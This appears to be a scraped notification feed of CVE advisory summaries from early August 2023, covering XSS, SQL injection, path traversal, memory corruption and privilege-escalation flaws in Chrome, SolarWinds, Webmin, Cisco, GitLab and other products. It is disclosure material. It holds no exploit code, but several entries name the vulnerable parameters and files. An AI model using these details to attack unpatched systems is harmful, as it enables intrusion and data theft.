🚨 CVE-2023-39379Fujitsu Software Infrastructure Manager (ISM) stores sensitive information at the product's maintenance data (ismsnap) in cleartext form. As a result, the password for the proxy server that is configured in ISM may be retrieved. Affected products and versions are as follows: Fujitsu Software Infrastructure Manager Advanced Edition V2.8.0.060, Fujitsu Software Infrastructure Manager Advanced Edition for PRIMEFLEX V2.8.0.060, and Fujitsu Software Infrastructure Manager Essential Edition V2.8.0.060.🎖@cveNotify |
|
| 2023-08-04 10:59:47 |
🚨 CVE-2023-38560An integer overflow flaw was found in pcl/pl/plfont.c:418 in pl_glyph_name in ghostscript. This issue may allow a local attacker to cause a denial of service via transforming a crafted PCL file to PDF format.🎖@cveNotify |
|
| 2023-08-04 06:00:19 |
🚨 CVE-2023-33560There is a Cross Site Scripting (XSS) vulnerability in "cid" parameter of preview.php in PHPJabbers Time Slots Booking Calendar v3.3.🎖@cveNotify |
|
| 2023-08-04 06:00:18 |
🚨 CVE-2023-38303An issue was discovered in Webmin 2.021. One can exploit a stored Cross-Site Scripting (XSS) attack to achieve Remote Command Execution (RCE) through the Users and Group's real name parameter.🎖@cveNotify |
|
| 2023-08-04 06:00:17 |
🚨 CVE-2023-38304An issue was discovered in Webmin 2.021. A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the Users and Groups functionality, allowing an attacker to store a malicious payload in the Group Name field when creating a new group.🎖@cveNotify |
|
| 2023-08-04 06:00:13 |
🚨 CVE-2023-33563In PHP Jabbers Time Slots Booking Calendar 3.3 , lack of verification when changing an email address and/or password (on the Profile Page) allows remote attackers to take over accounts.🎖@cveNotify |
|
| 2023-08-04 06:00:11 |
🚨 CVE-2023-3733Inappropriate implementation in WebApp Installs in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to potentially spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-04 06:00:10 |
🚨 CVE-2023-3734Inappropriate implementation in Picture In Picture in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to potentially spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-04 06:00:09 |
🚨 CVE-2023-3735Inappropriate implementation in Web API Permission Prompts in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-04 06:00:05 |
🚨 CVE-2023-3736Inappropriate implementation in Custom Tabs in Google Chrome on Android prior to 115.0.5790.98 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-04 06:00:04 |
🚨 CVE-2023-3737Inappropriate implementation in Notifications in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to spoof the contents of media notifications via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-04 06:00:03 |
🚨 CVE-2023-3729Use after free in Splitscreen in Google Chrome on ChromeOS prior to 115.0.5790.98 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via crafted UI interactions. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-04 06:00:02 |
🚨 CVE-2023-3731Use after free in Diagnostics in Google Chrome on ChromeOS prior to 115.0.5790.98 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted Chrome Extension. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-04 06:00:01 |
🚨 CVE-2023-3732Out of bounds memory access in Mojo in Google Chrome prior to 115.0.5790.98 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-04 05:59:57 |
🚨 CVE-2023-3728Use after free in WebRTC in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-04 05:59:56 |
🚨 CVE-2023-3727Use after free in WebRTC in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-04 05:59:55 |
🚨 CVE-2023-38989An issue in the delete function in the UserController class of jeesite v1.2.6 allows authenticated attackers to arbitrarily delete the Administrator's role information.🎖@cveNotify |
|
| 2023-08-04 05:59:54 |
🚨 CVE-2023-35791Vound Intella Connect 2.6.0.3 has an Open Redirect vulnerability.🎖@cveNotify |
|
| 2023-08-04 01:58:32 |
🚨 CVE-2023-37501A Persistent XSS vulnerability can be carried out in a certain field of Unica Campaign. An attacker could hijack a user's session and perform other attacks.🎖@cveNotify |
|
| 2023-08-04 01:58:31 |
🚨 CVE-2023-38950A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read arbitrary files via supplying a crafted payload.🎖@cveNotify |
|
| 2023-08-04 01:58:30 |
🚨 CVE-2023-38951A path traversal vulnerability in ZKTeco BioTime v8.5.5 allows attackers to write arbitrary files via using a malicious SFTP configuration.🎖@cveNotify |
|
| 2023-08-04 01:58:26 |
🚨 CVE-2023-20181A vulnerability in the web-based management interface of Cisco Small Business SPA500 Series IP Phones could allow an unauthenticated, remote attacker to conduct XSS attacks. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-08-04 01:58:25 |
🚨 CVE-2023-20204A vulnerability in the web-based management interface of Cisco BroadWorks CommPilot Application Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-08-04 01:58:24 |
🚨 CVE-2023-20215A vulnerability in the scanning engines of Cisco AsyncOS Software for Cisco Secure Web Appliance could allow an unauthenticated, remote attacker to bypass a configured rule, allowing traffic onto a network that should have been blocked. This vulnerability is due to improper detection of malicious traffic when the traffic is encoded with a specific content format. An attacker could exploit this vulnerability by using an affected device to connect to a malicious server and receiving crafted HTTP responses. A successful exploit could allow the attacker to bypass an explicit block rule and receive traffic that should have been rejected by the device.🎖@cveNotify |
|
| 2023-08-04 01:58:20 |
🚨 CVE-2023-20216A vulnerability in the privilege management functionality of all Cisco BroadWorks server types could allow an authenticated, local attacker to elevate privileges to root on an affected system. This vulnerability is due to incorrect implementation of user role permissions. An attacker could exploit this vulnerability by authenticating to the application as a user with the BWORKS or BWSUPERADMIN role and issuing crafted commands on an affected system. A successful exploit could allow the attacker to execute commands beyond the sphere of their intended access level, including initiating installs or running operating system commands with elevated permissions. There are workarounds that address this vulnerability.🎖@cveNotify |
|
| 2023-08-04 01:58:19 |
🚨 CVE-2023-30950The foundry campaigns service was found to be vulnerable to an unauthenticated information disclosure in a rest endpoint🎖@cveNotify |
|
| 2023-08-04 01:58:18 |
🚨 CVE-2023-30952A security defect was discovered in Foundry Issues that enabled users to create convincing phishing links by editing the request sent when creating an Issue. This defect was resolved in Frontend release 6.228.0 .🎖@cveNotify |
|
| 2023-08-04 01:58:14 |
🚨 CVE-2023-30958A security defect was identified in Foundry Frontend that enabled users to potentially conduct DOM XSS attacks if Foundry's CSP were to be bypassed.This defect was resolved with the release of Foundry Frontend 6.225.0.🎖@cveNotify |
|
| 2023-08-04 01:58:13 |
🚨 CVE-2023-37498A user is capable of assigning him/herself to arbitrary groups by reusing a POST request issued by an administrator. It is possible that an attacker could potentially escalate their privileges.🎖@cveNotify |
|
| 2023-08-04 01:58:12 |
🚨 CVE-2023-37500A Persistent Cross-site Scripting (XSS) vulnerability can be carried out on certain pages of Unica Platform. An attacker could hijack a user's session and perform other attacks.🎖@cveNotify |
|
| 2023-08-03 23:58:31 |
🚨 CVE-2022-47505The SolarWinds Platform was susceptible to the Local Privilege Escalation Vulnerability. This vulnerability allows a local adversary with a valid system user account to escalate local privileges.🎖@cveNotify |
|
| 2023-08-03 23:58:30 |
🚨 CVE-2023-23836SolarWinds Platform version 2022.4.1 was found to be susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to the SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-08-03 23:58:29 |
🚨 CVE-2022-47507SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-08-03 23:58:25 |
🚨 CVE-2022-47512Sensitive information was stored in plain text in a file that is accessible by a user with a local account in Hybrid Cloud Observability (HCO)/ SolarWinds Platform 2022.4. No other versions are affected🎖@cveNotify |
|
| 2023-08-03 23:58:24 |
🚨 CVE-2021-35246The application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a legitimate user's network traffic could bypass the application's use of SSL/TLS encryption and use the application as a platform for attacks against its users.🎖@cveNotify |
|
| 2023-08-03 23:58:23 |
🚨 CVE-2021-35226An entity in Network Configuration Manager product is misconfigured and exposing password field to Solarwinds Information Service (SWIS). Exposed credentials are encrypted and require authenticated access with an NCM role.🎖@cveNotify |
|
| 2023-08-03 23:58:19 |
🚨 CVE-2021-35232Hard coded credentials discovered in SolarWinds Web Help Desk product. Through these credentials, the attacker with local access to the Web Help Desk host machine allows to execute arbitrary HQL queries against the database and leverage the vulnerability to steal the password hashes of the users or insert arbitrary data into the database.🎖@cveNotify |
|
| 2023-08-03 23:58:18 |
🚨 CVE-2021-35248It has been reported that any Orion user, e.g. guest accounts can query the Orion.UserSettings entity and enumerate users and their basic settings.🎖@cveNotify |
|
| 2023-08-03 23:58:17 |
🚨 CVE-2021-35237A missing HTTP header (X-Frame-Options) in Kiwi Syslog Server has left customers vulnerable to click jacking. Clickjacking is an attack that occurs when an attacker uses a transparent iframe in a window to trick a user into clicking on an actionable item, such as a button or link, to another server in which they have an identical webpage. The attacker essentially hijacks the user activity intended for the original server and sends them to the other server. This is an attack on both the user and the server.🎖@cveNotify |
|
| 2023-08-03 23:58:14 |
🚨 CVE-2023-3134The Forminator WordPress plugin before 1.24.4 does not properly escape values that are being reflected inside form fields that use pre-populated query parameters, which could lead to reflected XSS attacks.🎖@cveNotify |
|
| 2023-08-03 23:58:13 |
🚨 CVE-2023-32226 Sysaid - CWE-552: Files or Directories Accessible to External Parties - Authenticated users may exfiltrate files from the server via an unspecified method.🎖@cveNotify |
|
| 2023-08-03 23:58:12 |
🚨 CVE-2023-4005Insufficient Session Expiration in GitHub repository fossbilling/fossbilling prior to 0.5.5.🎖@cveNotify |
|
| 2023-08-03 18:58:38 |
🚨 CVE-2005-2976Integer overflow in io-xpm.c in gdk-pixbuf 0.22.0 in GTK+ before 2.8.7 allows attackers to cause a denial of service (crash) or execute arbitrary code via an XPM file with large height, width, and colour values, a different vulnerability than CVE-2005-3186.🎖@cveNotify |
|
| 2023-08-03 18:58:37 |
🚨 CVE-2023-3946A reflected cross-site scripting (XSS) vulnerability in ePO prior to 5.10 SP1 Update 1allows a remote unauthenticated attacker to potentially obtain access to an ePO administrator's session by convincing the authenticated ePO administrator to click on a carefully crafted link. This would lead to limited access to sensitive information and limited ability to alter some information in ePO.🎖@cveNotify |
|
| 2023-08-03 18:58:36 |
🚨 CVE-2005-0372Directory traversal vulnerability in gftp before 2.0.18 for GTK+ allows remote malicious FTP servers to read arbitrary files via .. (dot dot) sequences in filenames returned from a LIST command.🎖@cveNotify |
|
| 2023-08-03 18:58:35 |
🚨 CVE-2010-0732gdk/gdkwindow.c in GTK+ before 2.18.5, as used in gnome-screensaver before 2.28.1, performs implicit paints on windows of type GDK_WINDOW_FOREIGN, which triggers an X error in certain circumstances and consequently allows physically proximate attackers to bypass screen locking and access an unattended workstation by pressing the Enter key many times.🎖@cveNotify |
|
| 2023-08-03 18:58:34 |
🚨 CVE-2014-1949GTK+ 3.10.9 and earlier, as used in cinnamon-screensaver, gnome-screensaver, and other applications, allows physically proximate attackers to bypass the lock screen by pressing the menu button.🎖@cveNotify |
|
| 2023-08-03 18:58:30 |
🚨 CVE-2022-36965Insufficient sanitization of inputs in QoE application input field could lead to stored and Dom based XSS attack. This issue is fixed and released in SolarWinds Platform (2022.3.0).🎖@cveNotify |
|
| 2023-08-03 18:58:29 |
🚨 CVE-2023-36213SQL injection vulnerability in MotoCMS v.3.4.3 allows a remote attacker to gain privileges via the keyword parameter of the search function.🎖@cveNotify |
|
| 2023-08-03 18:58:28 |
🚨 CVE-2023-4145Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/customer-data-framework prior to 3.4.2.🎖@cveNotify |
|
| 2023-08-03 18:58:27 |
🚨 CVE-2022-36961A vulnerable component of Orion Platform was vulnerable to SQL Injection, an authenticated attacker could leverage this for privilege escalation or remote code execution.🎖@cveNotify |
|
| 2023-08-03 18:58:24 |
🚨 CVE-2023-25835There is a stored Cross-site Scripting vulnerability in Esri Portal for ArcGIS Enterprise Sites versions 10.8.1 – 11.1 that may allow a remote, authenticated attacker to create a crafted link that is stored in the site configuration which when clicked could potentially execute arbitrary JavaScript code in the victims browser. The privileges required to execute this attack are high. The attack could disclose a privileged token which may result the attacker gaining full control of the Portal.🎖@cveNotify |
|
| 2023-08-03 18:58:23 |
🚨 CVE-2022-36963The SolarWinds Platform was susceptible to the Command Injection Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform admin account to execute arbitrary commands.🎖@cveNotify |
|
| 2023-08-03 18:58:22 |
🚨 CVE-2022-36966Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3 and previous.🎖@cveNotify |
|
| 2023-08-03 18:58:21 |
🚨 CVE-2021-35226An entity in Network Configuration Manager product is misconfigured and exposing password field to Solarwinds Information Service (SWIS). Exposed credentials are encrypted and require authenticated access with an NCM role.🎖@cveNotify |
|
| 2023-08-03 18:58:17 |
🚨 CVE-2001-0084GTK+ library allows local users to specify arbitrary modules via the GTK_MODULES environmental variable, which could allow local users to gain privileges if GTK+ is used by a setuid/setgid program.🎖@cveNotify |
|
| 2023-08-03 18:58:16 |
🚨 CVE-2023-32427This issue was addressed by using HTTPS when sending information over the network. This issue is fixed in Apple Music 4.2.0 for Android. An attacker in a privileged network position may be able to intercept network traffic.🎖@cveNotify |
|
| 2023-08-03 18:58:15 |
🚨 CVE-2023-38259A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.6.8, macOS Ventura 13.5, macOS Big Sur 11.7.9. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-08-03 18:58:14 |
🚨 CVE-2023-32734The issue was addressed with improved memory handling. This issue is fixed in iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, watchOS 9.6. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-08-03 15:58:27 |
🚨 CVE-2023-34093Strapi is an open-source headless content management system. Prior to version 4.10.8, anyone (Strapi developers, users, plugins) can make every attribute of a Content-Type public without knowing it. The vulnerability only affects the handling of content types by Strapi, not the actual content types themselves. Users can use plugins or modify their own content types without realizing that the `privateAttributes` getter is being removed, which can result in any attribute becoming public. This can lead to sensitive information being exposed or the entire system being taken control of by an attacker(having access to password hashes). Anyone can be impacted, depending on how people are using/extending content-types. If the users are mutating the content-type, they will not be affected. Version 4.10.8 contains a patch for this issue.🎖@cveNotify |
|
| 2023-08-03 15:58:25 |
🚨 CVE-2023-3548An unauthorized user could gain account access to IQ Wifi 6 versions prior to 2.0.2 by conducting a brute force authentication attack.🎖@cveNotify |
|
| 2023-08-03 15:58:21 |
🚨 CVE-2023-38745Pandoc before 3.1.6 allows arbitrary file write: this can be triggered by providing a crafted image element in the input when generating files via the --extract-media option or outputting to PDF format. This allows an attacker to create or overwrite arbitrary files, depending on the privileges of the process running Pandoc. It only affects systems that pass untrusted user input to Pandoc and allow Pandoc to be used to produce a PDF or with the --extract-media option. NOTE: this issue exists because of an incomplete fix for CVE-2023-35936 (failure to properly account for double encoded path names).🎖@cveNotify |
|
| 2023-08-03 15:58:17 |
🚨 CVE-2023-3982Cross-site Scripting (XSS) - Stored in GitHub repository omeka/omeka-s prior to 4.0.2.🎖@cveNotify |
|
| 2023-08-03 15:58:16 |
🚨 CVE-2023-38510Tolgee is an open-source localization platform. Starting in version 3.14.0 and prior to version 3.23.1, when a request is made using an API key, the backend fails to verify the permission scopes associated with the key, effectively bypassing permission checks entirely for some endpoints. It's important to note that this vulnerability only affects projects that have inadvertently exposed their API keys on the internet. Projects that have kept their API keys secure are not impacted. This issue is fixed in version 3.23.1.🎖@cveNotify |
|
| 2023-08-03 15:58:15 |
🚨 CVE-2023-3981Server-Side Request Forgery (SSRF) in GitHub repository omeka/omeka-s prior to 4.0.2.🎖@cveNotify |
|
| 2023-08-03 15:58:14 |
🚨 CVE-2023-38504Sails is a realtime MVC Framework for Node.js. In Sails apps prior to version 1.5.7,, an attacker can send a virtual request that will cause the node process to crash. This behavior was fixed in Sails v1.5.7. As a workaround, disable the sockets hook and remove the `sails.io.js` client.🎖@cveNotify |
|
| 2023-08-03 13:58:13 |
🚨 CVE-2023-3662In CODESYS Development System versions from 3.5.17.0 and prior to 3.5.19.20 a vulnerability allows for execution of binaries from the current working directory in the users context .🎖@cveNotify |
|
| 2023-08-03 13:58:12 |
🚨 CVE-2023-3663In CODESYS Development System versions from 3.5.11.20 and before 3.5.19.20 a missing integrity check might allow an unauthenticated remote attacker to manipulate the content of notifications received via HTTP by the CODESYS notification server.🎖@cveNotify |
|
| 2023-08-03 13:58:11 |
🚨 CVE-2023-4121A vulnerability was found in Beijing Baichuo Smart S85F Management Platform up to 20230722. It has been classified as critical. Affected is an unknown function. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235968. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-03 10:58:36 |
🚨 CVE-2023-4117A vulnerability, which was classified as problematic, has been found in PHP Jabbers Rental Property Booking 2.0. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235964. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-03 10:58:35 |
🚨 CVE-2023-4118A vulnerability, which was classified as problematic, was found in Cute Http File Server 2.0. This affects an unknown part of the component Search. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235965 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-03 10:58:34 |
🚨 CVE-2023-21407A broken access control was found allowing for privileged escalation of the operator account to gainadministrator privileges.🎖@cveNotify |
|
| 2023-08-03 10:58:32 |
🚨 CVE-2023-21408Due to insufficient file permissions, unprivileged users could gain access to unencrypted user credentialsthat are used in the integration interface towards 3rd party systems.🎖@cveNotify |
|
| 2023-08-03 10:58:31 |
🚨 CVE-2023-21409Due to insufficient file permissions, unprivileged users could gain access to unencrypted administratorcredentials allowing the configuration of the application.🎖@cveNotify |
|
| 2023-08-03 10:58:30 |
🚨 CVE-2023-21410User provided input is not sanitized on the AXIS License Plate Verifier specific “api.cgi” allowing forarbitrary code execution.🎖@cveNotify |
|
| 2023-08-03 10:58:29 |
🚨 CVE-2023-21411User provided input is not sanitized in the “Settings > Access Control” configuration interface allowing forarbitrary code execution.🎖@cveNotify |
|
| 2023-08-03 10:58:28 |
🚨 CVE-2023-21412User provided input is not sanitized on the AXIS License Plate Verifier specific “search.cgi” allowing forSQL injections.🎖@cveNotify |
|
| 2023-08-03 10:58:27 |
🚨 CVE-2023-4008An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.9 before 16.0.8, all versions starting from 16.1 before 16.1.3, all versions starting from 16.2 before 16.2.2. It was possible to takeover GitLab Pages with unique domain URLs if the random string added was known.🎖@cveNotify |
|
| 2023-08-03 10:58:26 |
🚨 CVE-2023-4116A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-03 10:58:25 |
🚨 CVE-2023-38747Heap-based buffer overflow vulnerability exists in CX-Programmer Included in CX-One CXONE-AL[][]D-V4 V9.80 and earlier. By having a user open a specially crafted CXP file, information disclosure and/or arbitrary code execution may occur.🎖@cveNotify |
|
| 2023-08-03 10:58:23 |
🚨 CVE-2023-38748Use after free vulnerability exists in CX-Programmer Included in CX-One CXONE-AL[][]D-V4 V9.80 and earlier. By having a user open a specially crafted CXP file, information disclosure and/or arbitrary code execution may occur.🎖@cveNotify |
|
| 2023-08-03 10:58:22 |
🚨 CVE-2023-4114A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-03 10:58:21 |
🚨 CVE-2023-4115A vulnerability classified as problematic has been found in PHP Jabbers Cleaning Business 1.0. Affected is an unknown function of the file /index.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. VDB-235962 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-03 10:58:20 |
🚨 CVE-2023-38744Denial-of-service (DoS) vulnerability due to improper validation of specified type of input issue exists in the built-in EtherNet/IP port of the CJ Series CJ2 CPU unit and the communication function of the CS/CJ Series EtherNet/IP unit. If an affected product receives a packet which is specially crafted by a remote unauthenticated attacker, the unit of the affected product may fall into a denial-of-service (DoS) condition. Affected products/versions are as follows: CJ2M CPU Unit CJ2M-CPU3[] Unit version of the built-in EtherNet/IP section Ver. 2.18 and earlier, CJ2H CPU Unit CJ2H-CPU6[]-EIP Unit version of the built-in EtherNet/IP section Ver. 3.04 and earlier, CS/CJ Series EtherNet/IP Unit CS1W-EIP21 V3.04 and earlier, and CS/CJ Series EtherNet/IP Unit CJ1W-EIP21 V3.04 and earlier.🎖@cveNotify |
|
| 2023-08-03 10:58:16 |
🚨 CVE-2023-38746Out-of-bounds read vulnerability/issue exists in CX-Programmer Included in CX-One CXONE-AL[][]D-V4 V9.80 and earlier. By having a user open a specially crafted CXP file, information disclosure and/or arbitrary code execution may occur.🎖@cveNotify |
|
| 2023-08-03 10:58:15 |
🚨 CVE-2023-3346Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in MITSUBSHI CNC Series allows a remote unauthenticated attacker to cause Denial of Service (DoS) condition and execute arbitrary code on the product by sending specially crafted packets. In addition, system reset is required for recovery.🎖@cveNotify |
|
| 2023-08-03 10:58:14 |
🚨 CVE-2023-3932An issue has been discovered in GitLab EE affecting all versions starting from 13.12 before 16.0.8, all versions starting from 16.1 before 16.1.3, all versions starting from 16.2 before 16.2.2. It was possible for an attacker to run pipeline jobs as an arbitrary user via scheduled security scan policies.🎖@cveNotify |
|
| 2023-08-03 10:58:13 |
🚨 CVE-2023-4112A vulnerability was found in PHP Jabbers Shuttle Booking Software 1.0. It has been classified as problematic. This affects an unknown part of the file /index.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-235959. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-03 10:58:12 |
🚨 CVE-2023-4113A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-235960. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-03 09:58:36 |
🚨 CVE-2012-4242Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.🎖@cveNotify |
|
| 2023-08-03 09:58:35 |
🚨 CVE-2020-20808Cross Site Scripting vulnerability in Qibosoft qibosoft v.7 and before allows a remote attacker to execute arbitrary code via the eindtijd and starttijd parameters of do/search.php.🎖@cveNotify |
|
| 2023-08-03 09:58:34 |
🚨 CVE-2023-36212File Upload vulnerability in Total CMS v.1.7.4 allows a remote attacker to execute arbitrary code via a crafted PHP file to the edit page function.🎖@cveNotify |
|
| 2023-08-03 09:58:30 |
🚨 CVE-2023-36255An issue in Eramba Limited Eramba Enterprise v.3.19.1 allows a remote attacker to execute arbitrary code via the path parameter in the URL.🎖@cveNotify |
|
| 2023-08-03 09:58:29 |
🚨 CVE-2023-38955ZKTeco BioAccess IVS v3.3.1 allows unauthenticated attackers to obtain sensitive information about all managed devices, including their IP addresses and device names.🎖@cveNotify |
|
| 2023-08-03 09:58:28 |
🚨 CVE-2023-38958An access control issue in ZKTeco BioAccess IVS v3.3.1 allows unauthenticated attackers to arbitrarily close and open the doors managed by the platform remotely via sending a crafted web request.🎖@cveNotify |
|
| 2023-08-03 09:58:24 |
🚨 CVE-2023-33368Some API routes exists in Control ID IDSecure 4.7.26.0 and prior, exfiltrating sensitive information and passwords to users accessing these API routes.🎖@cveNotify |
|
| 2023-08-03 09:58:23 |
🚨 CVE-2023-33370An uncaught exception vulnerability exists in Control ID IDSecure 4.7.26.0 and prior, allowing attackers to cause the main web server of IDSecure to fault and crash, causing a denial of service.🎖@cveNotify |
|
| 2023-08-03 09:58:22 |
🚨 CVE-2023-36082An isssue in GatesAIr Flexiva FM Transmitter/Exiter Fax 150W allows a remote attacker to gain privileges via the LDAP and SMTP credentials.🎖@cveNotify |
|
| 2023-08-03 09:58:18 |
🚨 CVE-2023-4069Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-03 09:58:17 |
🚨 CVE-2023-4071Heap buffer overflow in Visuals in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-03 09:58:16 |
🚨 CVE-2023-4072Out of bounds read and write in WebGL in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-01 10:58:14 |
🚨 CVE-2021-43755Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an Out-of-bounds Write vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.🎖@cveNotify |
|
| 2023-08-01 10:58:13 |
🚨 CVE-2021-39820Adobe InDesign versions 16.3 (and earlier), and 16.3.1 (and earlier) is affected by an Out-of-bounds Write vulnerability due to insecure handling of a malicious TIFF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.🎖@cveNotify |
|
| 2023-08-01 10:58:12 |
🚨 CVE-2023-26139Versions of the package underscore-keypath from 0.0.11 are vulnerable to Prototype Pollution via the name argument of the setProperty() function. Exploiting this vulnerability is possible due to improper input sanitization which allows the usage of arguments like “__proto__”.🎖@cveNotify |
|
| 2023-08-01 05:58:30 |
🚨 CVE-2023-26966libtiff 4.5.0 is vulnerable to Buffer Overflow in uv_encode() when libtiff reads a corrupted little-endian TIFF file and specifies the output to be big-endian.🎖@cveNotify |
|
| 2023-08-01 05:58:29 |
🚨 CVE-2023-26965loadImage() in tools/tiffcrop.c in LibTIFF through 4.5.0 has a heap-based use after free via a crafted TIFF image.🎖@cveNotify |
|
| 2023-08-01 05:58:28 |
🚨 CVE-2023-37903vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up to and including 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. This may result in Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. There are no patches and no known workarounds. Users are advised to find an alternative software.🎖@cveNotify |
|
| 2023-08-01 05:58:25 |
🚨 CVE-2023-34798An arbitrary file upload vulnerability in eoffice before v9.5 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2023-08-01 05:58:24 |
🚨 CVE-2022-46900An issue was discovered in Vocera Report Server and Voice Server 5.x through 5.8. There is Path Traversal in the Task Exec filename. The Vocera Report Console contains various jobs that are executed on the server at specified intervals, e.g., backup, etc. An authenticated user has the ability to modify these entries and set the executable path and parameters.🎖@cveNotify |
|
| 2023-08-01 05:58:23 |
🚨 CVE-2022-46898An issue was discovered in Vocera Report Server and Voice Server 5.x through 5.8. There is Path Traversal via the "restore SQL data" filename. The Vocera Report Console contains a websocket function that allows for the restoration of the database from a ZIP archive that expects a SQL import file. The filename provided is not properly sanitized and allows for the inclusion of a path-traversal payload that can be used to escape the intended Vocera restoration directory. An attacker could exploit this vulnerability to point to a crafted ZIP archive that contains SQL commands that could be executed against the database.🎖@cveNotify |
|
| 2023-08-01 05:58:19 |
🚨 CVE-2023-37772Online Shopping Portal Project v3.1 was discovered to contain a SQL injection vulnerability via the Email parameter at /shopping/login.php.🎖@cveNotify |
|
| 2023-08-01 05:58:18 |
